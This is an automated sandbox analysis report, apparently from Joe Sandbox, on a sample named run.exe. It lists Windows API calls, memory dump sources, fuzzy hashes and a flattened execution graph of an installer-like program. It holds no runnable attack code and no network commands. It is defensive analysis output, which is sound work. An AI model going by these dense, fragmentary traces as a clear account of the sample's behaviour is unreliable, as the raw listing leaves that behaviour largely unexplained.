• Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4141327611-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF75FBBCDA7), ref: 00007FF75FBC1761
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF75FBBCDA7), ref: 00007FF75FBC17C3
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF75FBBCDA7), ref: 00007FF75FBC17FD
                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF75FBBCDA7), ref: 00007FF75FBC1827
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1557788787-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF75FBB8850,?,?,00000050,00007FF75FBBA65D), ref: 00007FF75FBBE5CA
                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,?,00007FF75FBB8850,?,?,00000050,00007FF75FBBA65D), ref: 00007FF75FBBE632
                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,?,00007FF75FBB8850,?,?,00000050,00007FF75FBBA65D), ref: 00007FF75FBBE648
                                                                                                                                                                                                              • abort.LIBCMT ref: 00007FF75FBBE64E
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$abort
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1447195878-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBA2F08: ResetEvent.KERNEL32 ref: 00007FF75FBA2F21
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBA2F08: ReleaseSemaphore.KERNEL32 ref: 00007FF75FBA2F37
                                                                                                                                                                                                              • ReleaseSemaphore.KERNEL32 ref: 00007FF75FBA2BA0
                                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 00007FF75FBA2BBF
                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32 ref: 00007FF75FBA2BD6
                                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 00007FF75FBA2BE3
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBA2C88: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF75FBA2B8B,?,?,?,00007FF75FB9BDA6,?,?,?), ref: 00007FF75FBA2C8F
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBA2C88: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF75FBA2B8B,?,?,?,00007FF75FB9BDA6,?,?,?), ref: 00007FF75FBA2C9A
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 502429940-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CapsDevice$Release
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1035833867-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                              • String ID: e+000$gfff
                                                                                                                                                                                                              • API String ID: 3215553584-3030954782
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(?,00007FF75FB9B384,?,?,?,?,?,?,?,00007FF75FB9A5D6), ref: 00007FF75FB9CCBA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                                                              • String ID: UNC$\\?\
                                                                                                                                                                                                              • API String ID: 1611563598-253988292
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe
                                                                                                                                                                                                              • API String ID: 3307058713-591759711
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHandleType
                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                              • API String ID: 3000768030-2766056989
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWide_snwprintf
                                                                                                                                                                                                              • String ID: $%s$@%s
                                                                                                                                                                                                              • API String ID: 2650857296-834177443
                                                                                                                                                                                                              • Opcode ID: 56e57cf1c09785867a53bbaefc766c6cc58eeb29897c9ff07dd84e4525d1ecf1
                                                                                                                                                                                                              • Instruction ID: 4b935fe5b8070f067752d59386c007a8afebbcc18a0e9b9e14f04f79ee1301f9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56e57cf1c09785867a53bbaefc766c6cc58eeb29897c9ff07dd84e4525d1ecf1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A21A271A18BC2D1EBA0EB21E1403EAA364FB84B80FD84036DA4C03B54CF7ED945C760
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
• Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                              • API String ID: 2573137834-1018135373
                                                                                                                                                                                                              • Opcode ID: f29d77152debfc2f8eafed337615e021f7e67407580bf3ec3e672dc6c6bff7a2
                                                                                                                                                                                                              • Instruction ID: a9fd8e7424b13587cd35032d215a1d89fbac663ae3453232f98676018de665d0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f29d77152debfc2f8eafed337615e021f7e67407580bf3ec3e672dc6c6bff7a2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D110032618B82C2EB119F25E44029AB7A5FB84B94F9C4235EECD07758DF3DDA518B14
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF75FBA2B8B,?,?,?,00007FF75FB9BDA6,?,?,?), ref: 00007FF75FBA2C8F
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF75FBA2B8B,?,?,?,00007FF75FB9BDA6,?,?,?), ref: 00007FF75FBA2C9A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
• Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLastObjectSingleWait
                                                                                                                                                                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                                                                                              • API String ID: 1211598281-2248577382
                                                                                                                                                                                                              • Opcode ID: e86905edea1ff1312e1e5010d920059bceae7f9a29b5ec9c9f75170627a4ed9e
                                                                                                                                                                                                              • Instruction ID: e21731753bf965ec08944c24d8aa13f214096b1c7a2a1f17da5b941d3255a11d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e86905edea1ff1312e1e5010d920059bceae7f9a29b5ec9c9f75170627a4ed9e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47E01A21E09886C1FB00BB359C915E6A261AF51730FE84331C07D826E19F2CA445C721
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
• Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FindHandleModuleResource
                                                                                                                                                                                                              • String ID: RTL
                                                                                                                                                                                                              • API String ID: 3537982541-834975271
                                                                                                                                                                                                              • Opcode ID: 576d5e6c6381f79c549a6baf7b7f5f9973be6c1af48ec972e7550f1965791ab8
                                                                                                                                                                                                              • Instruction ID: 9ca7fd1ae0d0f1c84a7ab517d1f97421e61d617e8c1b43f80933fedc37eb99e5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 576d5e6c6381f79c549a6baf7b7f5f9973be6c1af48ec972e7550f1965791ab8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0BD01751F0A6C6C2FF196B71A8457B752906B28B41E8C0038C90D0A394EF2CD088C725
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:16.1%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:13.6%
                                                                                                                                                                                                              Total number of Nodes:1366
                                                                                                                                                                                                              Total number of Limit Nodes:26
404b8b 4041->4093 4097 405a32 GetDlgItemTextW 4041->4097 4042->4036 4048 40435f 18 API calls 4043->4048 4044->4041 4049 40640a 17 API calls 4044->4049 4044->4093 4046 4043c6 8 API calls 4051 404b9f 4046->4051 4052 4048b7 4047->4052 4053 4048dd 4048->4053 4054 40496c SHBrowseForFolderW 4049->4054 4050 404a0c 4055 405dc5 18 API calls 4050->4055 4052->4043 4061 405cbd 3 API calls 4052->4061 4056 40435f 18 API calls 4053->4056 4054->4041 4057 404984 CoTaskMemFree 4054->4057 4058 404a12 4055->4058 4059 4048eb 4056->4059 4060 405cbd 3 API calls 4057->4060 4098 4063e8 lstrcpynW 4058->4098 4096 404394 SendMessageW 4059->4096 4063 404991 4060->4063 4061->4043 4066 4049c8 SetDlgItemTextW 4063->4066 4070 40640a 17 API calls 4063->4070 4065 4048f1 4068 4067c2 5 API calls 4065->4068 4066->4041 4067 404a29 4069 4067c2 5 API calls 4067->4069 4068->4044 4071 404a30 4069->4071 4072 4049b0 lstrcmpiW 4070->4072 4073 404a71 4071->4073 4081 405d09 2 API calls 4071->4081 4083 404ac9 4071->4083 4072->4066 4075 4049c1 lstrcatW 4072->4075 4099 4063e8 lstrcpynW 4073->4099 4075->4066 4076 404a78 4077 405d68 4 API calls 4076->4077 4078 404a7e GetDiskFreeSpaceW 4077->4078 4080 404aa2 MulDiv 4078->4080 4078->4083 4080->4083 4081->4071 4082 404b3a 4085 404b5d 4082->4085 4087 40140b 2 API calls 4082->4087 4083->4082 4084 404cd5 20 API calls 4083->4084 4086 404b27 4084->4086 4100 404381 EnableWindow 4085->4100 4089 404b3c SetDlgItemTextW 4086->4089 4090 404b2c 4086->4090 4087->4085 4089->4082 4092 404c0c 20 API calls 4090->4092 4091 404b79 4091->4093 4101 4047a9 4091->4101 4092->4082 4093->4046 4095->4039 4096->4065 4097->4050 4098->4067 4099->4076 4100->4091 4102 4047b7 4101->4102 4103 4047bc SendMessageW 4101->4103 4102->4103 4103->4093 4104 401b53 4105 402c41 17 API calls 4104->4105 4106 401b5a 4105->4106 4107 402c1f 17 API calls 4106->4107 4108 401b63 wsprintfW 4107->4108 4109 402ac5 4108->4109 4110 401956 4111 402c41 17 API calls 4110->4111 4112 40195d lstrlenW 4111->4112 4113 402592 
4112->4113 4121 4014d7 4122 402c1f 17 API calls 4121->4122 4123 4014dd Sleep 4122->4123 4125 402ac5 4123->4125 4126 401f58 4127 402c41 17 API calls 4126->4127 4128 401f5f 4127->4128 4129 40672b 2 API calls 4128->4129 4130 401f65 4129->4130 4132 401f76 4130->4132 4133 40632f wsprintfW 4130->4133 4133->4132 4134 402259 4135 402c41 17 API calls 4134->4135 4136 40225f 4135->4136 4137 402c41 17 API calls 4136->4137 4138 402268 4137->4138 4139 402c41 17 API calls 4138->4139 4140 402271 4139->4140 4141 40672b 2 API calls 4140->4141 4142 40227a 4141->4142 4143 40228b lstrlenW lstrlenW 4142->4143 4144 40227e 4142->4144 4146 405450 24 API calls 4143->4146 4145 405450 24 API calls 4144->4145 4148 402286 4144->4148 4145->4148 4147 4022c9 SHFileOperationW 4146->4147 4147->4144 4147->4148 4149 40175c 4150 402c41 17 API calls 4149->4150 4151 401763 4150->4151 4152 405f0d 2 API calls 4151->4152 4153 40176a 4152->4153 4153->4153 4154 401d5d GetDlgItem GetClientRect 4155 402c41 17 API calls 4154->4155 4156 401d8f LoadImageW SendMessageW 4155->4156 4157 402ac5 4156->4157 4158 401dad DeleteObject 4156->4158 4158->4157 4159 4022dd 4160 4022e4 4159->4160 4161 4022f7 4159->4161 4162 40640a 17 API calls 4160->4162 4163 4022f1 4162->4163 4164 405a4e MessageBoxIndirectW 4163->4164 4164->4161 4165 401563 4166 402a6b 4165->4166 4169 40632f wsprintfW 4166->4169 4168 402a70 4169->4168 3421 4023e4 3422 402c41 17 API calls 3421->3422 3423 4023f6 3422->3423 3424 402c41 17 API calls 3423->3424 3425 402400 3424->3425 3438 402cd1 3425->3438 3428 402ac5 3429 402438 3430 402444 3429->3430 3442 402c1f 3429->3442 3433 402463 RegSetValueExW 3430->3433 3445 4031d6 3430->3445 3431 402c41 17 API calls 3434 40242e lstrlenW 3431->3434 3436 402479 RegCloseKey 3433->3436 3434->3429 3436->3428 3439 402cec 3438->3439 3460 406283 3439->3460 3443 40640a 17 API calls 3442->3443 3444 402c34 3443->3444 3444->3430 3446 403201 3445->3446 3447 4031e5 SetFilePointer 3445->3447 3464 4032de GetTickCount 3446->3464 3447->3446 
3450 405f61 ReadFile 3451 403221 3450->3451 3452 4032de 42 API calls 3451->3452 3454 40329e 3451->3454 3453 403238 3452->3453 3453->3454 3455 4032a4 ReadFile 3453->3455 3457 403247 3453->3457 3454->3433 3455->3454 3457->3454 3458 405f61 ReadFile 3457->3458 3459 405f90 WriteFile 3457->3459 3458->3457 3459->3457 3461 406292 3460->3461 3462 402410 3461->3462 3463 40629d RegCreateKeyExW 3461->3463 3462->3428 3462->3429 3462->3431 3463->3462 3465 403436 3464->3465 3466 40330c 3464->3466 3467 402e8e 32 API calls 3465->3467 3477 40345d SetFilePointer 3466->3477 3473 403208 3467->3473 3469 403317 SetFilePointer 3475 40333c 3469->3475 3473->3450 3473->3454 3474 405f90 WriteFile 3474->3475 3475->3473 3475->3474 3476 403417 SetFilePointer 3475->3476 3478 403447 3475->3478 3481 406943 3475->3481 3488 402e8e 3475->3488 3476->3465 3477->3469 3479 405f61 ReadFile 3478->3479 3480 40345a 3479->3480 3480->3475 3482 406968 3481->3482 3483 406970 3481->3483 3482->3475 3483->3482 3484 406a00 GlobalAlloc 3483->3484 3485 4069f7 GlobalFree 3483->3485 3486 406a77 GlobalAlloc 3483->3486 3487 406a6e GlobalFree 3483->3487 3484->3482 3484->3483 3485->3484 3486->3482 3486->3483 3487->3486 3489 402eb7 3488->3489 3490 402e9f 3488->3490 3493 402ec7 GetTickCount 3489->3493 3494 402ebf 3489->3494 3491 402ea8 DestroyWindow 3490->3491 3492 402eaf 3490->3492 3491->3492 3492->3475 3493->3492 3496 402ed5 3493->3496 3503 4067fe 3494->3503 3497 402f0a CreateDialogParamW ShowWindow 3496->3497 3498 402edd 3496->3498 3497->3492 3498->3492 3507 402e72 3498->3507 3500 402eeb wsprintfW 3501 405450 24 API calls 3500->3501 3502 402f08 3501->3502 3502->3492 3504 40681b PeekMessageW 3503->3504 3505 406811 DispatchMessageW 3504->3505 3506 40682b 3504->3506 3505->3504 3506->3492 3508 402e81 3507->3508 3509 402e83 MulDiv 3507->3509 3508->3509 3509->3500 3751 4039e6 3752 403a01 3751->3752 3753 4039f7 CloseHandle 3751->3753 3754 403a15 3752->3754 3755 403a0b CloseHandle 3752->3755 3753->3752 3760 403a43 3754->3760 
3755->3754 3758 405afa 67 API calls 3759 403a26 3758->3759 3761 403a51 3760->3761 3762 403a1a 3761->3762 3763 403a56 FreeLibrary GlobalFree 3761->3763 3762->3758 3763->3762 3763->3763 4177 401968 4178 402c1f 17 API calls 4177->4178 4179 40196f 4178->4179 4180 402c1f 17 API calls 4179->4180 4181 40197c 4180->4181 4182 402c41 17 API calls 4181->4182 4183 401993 lstrlenW 4182->4183 4185 4019a4 4183->4185 4184 4019e5 4185->4184 4189 4063e8 lstrcpynW 4185->4189 4187 4019d5 4187->4184 4188 4019da lstrlenW 4187->4188 4188->4184 4189->4187 4190 402868 4191 402c41 17 API calls 4190->4191 4192 40286f FindFirstFileW 4191->4192 4193 402897 4192->4193 4196 402882 4192->4196 4198 40632f wsprintfW 4193->4198 4195 4028a0 4199 4063e8 lstrcpynW 4195->4199 4198->4195 4199->4196 4200 40166a 4201 402c41 17 API calls 4200->4201 4202 401670 4201->4202 4203 40672b 2 API calls 4202->4203 4204 401676 4203->4204 3836 40176f 3837 402c41 17 API calls 3836->3837 3838 401776 3837->3838 3839 401796 3838->3839 3840 40179e 3838->3840 3875 4063e8 lstrcpynW 3839->3875 3876 4063e8 lstrcpynW 3840->3876 3843 40179c 3847 40667c 5 API calls 3843->3847 3844 4017a9 3845 405cbd 3 API calls 3844->3845 3846 4017af lstrcatW 3845->3846 3846->3843 3865 4017bb 3847->3865 3848 40672b 2 API calls 3848->3865 3849 405eb9 2 API calls 3849->3865 3851 4017cd CompareFileTime 3851->3865 3852 40188d 3854 405450 24 API calls 3852->3854 3853 401864 3855 405450 24 API calls 3853->3855 3864 401879 3853->3864 3856 401897 3854->3856 3855->3864 3857 4031d6 44 API calls 3856->3857 3859 4018aa 3857->3859 3858 4063e8 lstrcpynW 3858->3865 3860 4018be SetFileTime 3859->3860 3861 4018d0 FindCloseChangeNotification 3859->3861 3860->3861 3863 4018e1 3861->3863 3861->3864 3862 40640a 17 API calls 3862->3865 3866 4018e6 3863->3866 3867 4018f9 3863->3867 3865->3848 3865->3849 3865->3851 3865->3852 3865->3853 3865->3858 3865->3862 3870 405a4e MessageBoxIndirectW 3865->3870 3874 405ede GetFileAttributesW CreateFileW 3865->3874 3868 40640a 17 
API calls 3866->3868 3869 40640a 17 API calls 3867->3869 3871 4018ee lstrcatW 3868->3871 3872 401901 3869->3872 3870->3865 3871->3872 3873 405a4e MessageBoxIndirectW 3872->3873 3873->3864 3874->3865 3875->3843 3876->3844 4205 4027ef 4206 4027f6 4205->4206 4209 402a70 4205->4209 4207 402c1f 17 API calls 4206->4207 4208 4027fd 4207->4208 4210 40280c SetFilePointer 4208->4210 4210->4209 4211 40281c 4210->4211 4213 40632f wsprintfW 4211->4213 4213->4209 4214 401a72 4215 402c1f 17 API calls 4214->4215 4216 401a7b 4215->4216 4217 402c1f 17 API calls 4216->4217 4218 401a20 4217->4218 4219 406af2 4220 406976 4219->4220 4221 4072e1 4220->4221 4222 406a00 GlobalAlloc 4220->4222 4223 4069f7 GlobalFree 4220->4223 4224 406a77 GlobalAlloc 4220->4224 4225 406a6e GlobalFree 4220->4225 4222->4220 4222->4221 4223->4222 4224->4220 4224->4221 4225->4224 4226 401573 4227 401583 ShowWindow 4226->4227 4228 40158c 4226->4228 4227->4228 4229 402ac5 4228->4229 4230 40159a ShowWindow 4228->4230 4230->4229 4231 402df3 4232 402e05 SetTimer 4231->4232 4233 402e1e 4231->4233 4232->4233 4234 402e6c 4233->4234 4235 402e72 MulDiv 4233->4235 4236 402e2c wsprintfW SetWindowTextW SetDlgItemTextW 4235->4236 4236->4234 4238 401cf3 4239 402c1f 17 API calls 4238->4239 4240 401cf9 IsWindow 4239->4240 4241 401a20 4240->4241 4242 4014f5 SetForegroundWindow 4243 402ac5 4242->4243 4244 402576 4245 402c41 17 API calls 4244->4245 4246 40257d 4245->4246 4249 405ede GetFileAttributesW CreateFileW 4246->4249 4248 402589 4249->4248 3783 401b77 3784 401b84 3783->3784 3785 401bc8 3783->3785 3788 4022e4 3784->3788 3793 401b9b 3784->3793 3786 401bf2 GlobalAlloc 3785->3786 3787 401bcd 3785->3787 3789 40640a 17 API calls 3786->3789 3798 401c0d 3787->3798 3802 4063e8 lstrcpynW 3787->3802 3790 40640a 17 API calls 3788->3790 3789->3798 3792 4022f1 3790->3792 3797 405a4e MessageBoxIndirectW 3792->3797 3803 4063e8 lstrcpynW 3793->3803 3794 401bdf GlobalFree 3794->3798 3796 401baa 3804 4063e8 lstrcpynW 3796->3804 3797->3798 
3800 401bb9 3805 4063e8 lstrcpynW 3800->3805 3802->3794 3803->3796 3804->3800 3805->3798 4250 4024f8 4260 402c81 4250->4260 4253 402c1f 17 API calls 4254 40250b 4253->4254 4255 402533 RegEnumValueW 4254->4255 4256 402527 RegEnumKeyW 4254->4256 4258 40288b 4254->4258 4257 402548 RegCloseKey 4255->4257 4256->4257 4257->4258 4261 402c41 17 API calls 4260->4261 4262 402c98 4261->4262 4263 406255 RegOpenKeyExW 4262->4263 4264 402502 4263->4264 4264->4253 4265 40167b 4266 402c41 17 API calls 4265->4266 4267 401682 4266->4267 4268 402c41 17 API calls 4267->4268 4269 40168b 4268->4269 4270 402c41 17 API calls 4269->4270 4271 401694 MoveFileW 4270->4271 4272 4016a7 4271->4272 4273 4016a0 4271->4273 4274 40672b 2 API calls 4272->4274 4277 402250 4272->4277 4275 401423 24 API calls 4273->4275 4276 4016b6 4274->4276 4275->4277 4276->4277 4278 4061ae 36 API calls 4276->4278 4278->4273 4286 401e7d 4287 402c41 17 API calls 4286->4287 4288 401e83 4287->4288 4289 402c41 17 API calls 4288->4289 4290 401e8c 4289->4290 4291 402c41 17 API calls 4290->4291 4292 401e95 4291->4292 4293 402c41 17 API calls 4292->4293 4294 401e9e 4293->4294 4295 401423 24 API calls 4294->4295 4296 401ea5 4295->4296 4303 405a14 ShellExecuteExW 4296->4303 4298 401ee7 4299 406873 5 API calls 4298->4299 4301 40288b 4298->4301 4300 401f01 FindCloseChangeNotification 4299->4300 4300->4301 4303->4298 4304 4019ff 4305 402c41 17 API calls 4304->4305 4306 401a06 4305->4306 4307 402c41 17 API calls 4306->4307 4308 401a0f 4307->4308 4309 401a16 lstrcmpiW 4308->4309 4310 401a28 lstrcmpW 4308->4310 4311 401a1c 4309->4311 4310->4311 4312 401000 4313 401037 BeginPaint GetClientRect 4312->4313 4314 40100c DefWindowProcW 4312->4314 4316 4010f3 4313->4316 4317 401179 4314->4317 4318 401073 CreateBrushIndirect FillRect DeleteObject 4316->4318 4319 4010fc 4316->4319 4318->4316 4320 401102 CreateFontIndirectW 4319->4320 4321 401167 EndPaint 4319->4321 4320->4321 4322 401112 6 API calls 4320->4322 4321->4317 4322->4321 4323 
